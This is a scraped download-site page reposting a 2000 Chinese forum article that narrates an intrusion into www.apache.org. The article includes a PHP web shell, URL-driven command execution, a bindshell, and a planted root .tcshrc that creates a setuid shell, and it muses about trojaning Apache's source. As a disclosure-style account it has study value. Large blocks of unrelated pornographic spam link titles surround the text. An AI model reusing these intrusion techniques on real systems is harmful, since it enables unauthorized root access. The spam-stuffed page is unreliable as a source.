亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 我們是如何攻破www.apache.org的.txt

?? 網絡安全方面的書籍,非常好,本人從事嵌入linux以及網絡方面的研究
?? TXT
字號:
發信人: aeroboy (三靜), 信區: Security 

標  題: 我們是如何攻破www.apache.org的 

發信站: 北大未名 (Fri Jun  9 09:58:06 2000), 轉信 

  

一、寫在前面 

這篇文章并不是發現了什么最新的漏洞,它只是指出了一個普通的配置錯誤--甚至連ap 

ache.org 的工作人員也會配置錯誤:),所以這只是一個警告:修補你的系統,才能防止 

惡意侵襲。 

二、介紹 

這里描述了我們如何在一周內成功地得到了運行www.apache.org的機器的root權限并且 

將其主頁面上的Powered by Apache圖樣(羽毛狀的圖畫)改成了Powered by Microsof 

t BackOffice的圖樣,沒有做其它的任何改動了--除了幫他們趕跑了另外(可能是惡意) 

的入侵者。 

這里所描述的漏洞甚至不是apache相關的,它們僅僅是配置失誤,其中之一是BugZilla 

 的……但它的開發者在README文件中對配置方法做了詳盡的描述,所以——一切只能是 

使用者自己的責任了,apache的用戶不必為此而擔心的:)。 

我們對www.apache.org進行嘗試的原因是有太多的服務器上跑的都是阿帕奇了,如果它 

的主機是不安全的,那么入侵者就可能在它的源代碼里放置后門,這會危及許多用戶的 

利益。 

當然我們不愿看到這種事發生,所以我們幫apache補上了漏洞——當然在得到了ROOT 權 

限之后我們無法控制自己更改主頁的欲望:),開個小玩笑吧。 

以下是整個入侵的過程: 

1、ftproot == wwwroot 

o+w dirs 

在尋找apache httpserver想要查看新版本是否存在緩沖溢出的過程中——我們連接上了 

ftp:/ftp.apache.org——和http://www.apache.org是同一個目錄并且有一個可寫的目 

錄存在! 

于是我們寫了一個小腳本wuh.php3包含了下面的語句: 

<? 

passthru($cmd); 

?> 

將它上傳到了那個可寫的目錄中。 

2、Our commands executed 

所以,很方便的,id這個命令可以被下面的語句調用: 

http://www.apache.org/thatdir/wuh.php3?cmd=id 

而后再上傳一些bindshell的程序并用類似 

http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c 

的語句來編譯它,然后執行…… 

http://www.apache.org/thatdir/wuh.php3?cmd=./httpd 

3、The shell 

我們使用的bindshell程序是有密碼驗證的:),相對安全一些。 

現在我們可以telnet到端口65533——我們定義的端口綁定處了,這樣我們得到了本地n 

obody權限的進入權——因為cgi是以nobody身份運行的。 

4、The apache.org box 

在apache.org的機器里我們發現了: 

-o=rx /root 

-o=rx homedirs 

apache.org運行的是freebsd3.4的平臺,我們不想僅僅通過緩沖區溢出或者亂七八糟的 

exploit來得到root,讓我們來試試僅僅通過他們自己配置的漏洞來得到最高權限吧! 

5、Mysql 

經過長時間的搜索,我們發現mysql是以root的權限運行的,并且可以本地運行,因為a 

pache.org還運行了bugzilla需要mysql帳號,并且將其用戶名/密碼明文存放,所以很輕 

易的就可以獲得mysql數據庫的帳號密碼。 

我們下載了nportredird(從名字就可以知道應該是端口重定向的工具了),并設置成允許 

我的IP從23306端口接入并且重定向到本地的3306端口——這樣我就能使用我的 mysql客 

戶端了。 

6、完全控制mysql,用它來建立文件 

通過3306端口進入后,用bugs的帳號進入——BugZilla默認安裝帶來的安全問題之一吧 

…… 包括以root身份運行mysqld……。 

用'SELECT ... INTO OUTFILE;'的方法,我們可以在任何地方以root的身份建立文件, 

這些文件將是666權限的,無法覆蓋其它文件,但它仍然是有用的,你準備如何利用它呢 

?無法用.rhosts——任何人可讀的.rhosts,rshd是不允許連接運行的,所以rsh無法利 

用。 

7、添加/root/.tcshrc 

于是我們決定給他下個套:),于是我們在root的文件夾建立一個文件/root/.tcshrc 

#!/bin/sh 

cp /bin/sh /tmp/.rootsh 

chmod 4755 /tmp/.rootsh 

rm -f /root/.tcshrc 

8、ROOT!! 

就這么簡單,現在我們可以等待某人來運行su了,很幸運的——我們沒有等太久,就得 

到了一個suid的shell,成為root后的事情也是同樣微不足道的——更改主頁并且給主機 

的管理員發送了Email通知了存在的漏洞。 

9、修補ftproot==wwwroot的漏洞 

進入系統后我們做的另一件是建立ftproot,將dist移至ftproot/dist并且將ftproot指 

向這個目錄,將可寫的目錄更改成入侵者無法利用的,保持FTP服務不變…… 

10、我們可以做什么? 

還記得去年發生在ftp.win.tue.nl的事嗎?有人在tcp_wrappers里放了木馬:),如果我 

們想這么做的話,就可以將木馬放在阿帕奇里——編輯源程序并讓大家來下載這個有木 

馬后門的版本,很刺激,不是嗎:) 

11、簡要回顧: 

發現ftproot==webroot--->可寫的目錄允許上傳php3腳本--->mysqld以root運行,而且 

缺乏密碼保護……這就是配置錯誤所在了。 

好了……一切順利:) 

摘自:安全焦點 

  

-- 

張三慕李四 



靜心難靜思 

何處佳人去 

濤聲隱蹤息 

  

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
色婷婷久久一区二区三区麻豆| 欧美成人r级一区二区三区| 欧美丝袜丝nylons| 日本一区二区三区高清不卡| 亚洲成av人片| 不卡视频在线看| 欧美电影免费提供在线观看| 中文字幕精品—区二区四季| 男人的j进女人的j一区| 色悠悠久久综合| 欧美高清一级片在线观看| 青青草原综合久久大伊人精品| 99精品黄色片免费大全| 久久久www免费人成精品| 性做久久久久久免费观看| 91丝袜美腿高跟国产极品老师 | 欧美一级日韩免费不卡| 亚洲日本在线a| 顶级嫩模精品视频在线看| 日韩欧美一区在线| 国产a级毛片一区| 精品福利在线导航| 久久99国产精品成人| 欧洲精品在线观看| 日韩理论在线观看| 99久久久久免费精品国产| 国产欧美日韩另类一区| 高清shemale亚洲人妖| 国产三级精品在线| 国产裸体歌舞团一区二区| 久久一二三国产| 国产一区二区视频在线| 26uuu精品一区二区| 精品一区二区在线视频| 久久夜色精品国产欧美乱极品| 美腿丝袜一区二区三区| 日韩免费电影一区| 国产制服丝袜一区| 国产成都精品91一区二区三| 国产 欧美在线| 欧美日韩精品一区二区三区四区| 久久综合九色综合欧美亚洲| 亚洲激情av在线| 国产精品自拍在线| 欧美精品aⅴ在线视频| 中文天堂在线一区| 久久激五月天综合精品| 色哦色哦哦色天天综合| 久久色成人在线| 日韩高清欧美激情| 日本韩国欧美在线| 国产精品美女一区二区三区| 乱中年女人伦av一区二区| 在线免费一区三区| 1024成人网| 国产成人av一区| 日韩女优电影在线观看| 视频一区二区中文字幕| 在线观看一区不卡| 亚洲天堂免费在线观看视频| 国产成人在线视频播放| 精品福利一区二区三区| 视频一区中文字幕国产| 欧美撒尿777hd撒尿| 亚洲精品成人少妇| 99精品视频一区二区三区| 中文一区二区完整视频在线观看| 秋霞电影一区二区| 欧美一级xxx| 免费亚洲电影在线| 日韩一区二区三区视频| 爽好久久久欧美精品| 欧美精品视频www在线观看| 亚洲国产日韩a在线播放性色| www.久久久久久久久| 国产精品久久777777| 成人国产精品视频| 亚洲天堂免费在线观看视频| 91在线视频免费91| 一区二区三区小说| 欧美日韩午夜在线| 三级成人在线视频| 日韩欧美在线影院| 国产一区二区日韩精品| 91免费小视频| 丝袜美腿亚洲色图| 亚洲美女区一区| 国产精品色婷婷| 精品成人一区二区三区四区| 欧美亚一区二区| 一本一道综合狠狠老| 高清成人免费视频| 久久99精品久久只有精品| 亚洲第一福利视频在线| 亚洲视频一区在线| 国产精品久久久久影院色老大| 日韩欧美二区三区| 欧美精品三级日韩久久| 91久久精品网| 色一情一乱一乱一91av| 成人高清视频在线观看| 国产精品一区二区黑丝| 激情综合色丁香一区二区| 秋霞国产午夜精品免费视频| 99在线精品视频| 国产精品99精品久久免费| 久久精品国产精品亚洲红杏| 日日摸夜夜添夜夜添精品视频| 亚洲在线成人精品| 亚洲伊人伊色伊影伊综合网| 亚洲黄色免费电影| 亚洲视频免费观看| 亚洲精品中文在线影院| 亚洲免费av高清| 亚洲最新在线观看| 亚洲国产裸拍裸体视频在线观看乱了| 亚洲色图制服诱惑 | 成+人+亚洲+综合天堂| 国产乱码精品一品二品| 国产精品亚洲第一区在线暖暖韩国| 精品一二三四区| 国产一区二区免费在线| 成人精品视频一区二区三区 | 色婷婷一区二区三区四区| 一本色道久久综合狠狠躁的推荐| 97se狠狠狠综合亚洲狠狠| 日本韩国一区二区三区视频| 欧美日韩久久不卡| 欧美videos大乳护士334| 久久免费的精品国产v∧| 国产欧美日韩麻豆91| 亚洲美女屁股眼交| 青青草视频一区| 国产成人h网站| 色综合久久中文综合久久97| 欧美绝品在线观看成人午夜影视| 91精品国产91热久久久做人人| 精品区一区二区| 国产精品免费久久| 亚洲大片精品永久免费| 国产一区视频网站| 91在线视频播放地址| 9191久久久久久久久久久| 2021久久国产精品不只是精品| 国产精品二区一区二区aⅴ污介绍| 亚洲精品视频一区| 美女被吸乳得到大胸91| 成人午夜在线免费| 欧美精品久久99久久在免费线 | 欧美日韩不卡一区| 久久久一区二区| 亚洲一区二区三区四区五区中文| 美女免费视频一区| 色88888久久久久久影院按摩| 日韩欧美123| 一区二区高清视频在线观看| 国精产品一区一区三区mba视频| 99精品久久久久久| 精品99999| 亚洲二区在线观看| 日韩欧美一级特黄在线播放| 综合久久久久久| 激情小说亚洲一区| 欧美日本在线观看| 国产精品成人免费| 国内不卡的二区三区中文字幕| 欧美三级中文字幕| 中文字幕不卡的av| 久久超级碰视频| 欧美午夜精品一区| 国产精品超碰97尤物18| 国产一区啦啦啦在线观看| 欧美午夜一区二区| 亚洲欧美日韩一区二区三区在线观看| 久久精品国产精品青草| 欧美色视频一区| 亚洲男同性恋视频| 成人一区二区三区视频在线观看| 日韩美一区二区三区| 亚洲午夜久久久久| 日本韩国精品在线| 国产精品免费看片| 国产一区二区在线影院| 欧美一区二区啪啪| 亚洲一区二区三区美女| 97se亚洲国产综合在线| 国产精品网站在线观看| 国产一区二区看久久| 日韩精品中午字幕| 日本不卡视频在线观看| 在线成人免费视频| 日韩精品免费视频人成| 欧美日本高清视频在线观看| 一区二区不卡在线播放 | 欧美一级淫片007| 日韩国产精品久久久| 欧美福利视频一区| 日韩黄色一级片| 欧美一区二区日韩一区二区| 日本不卡一二三|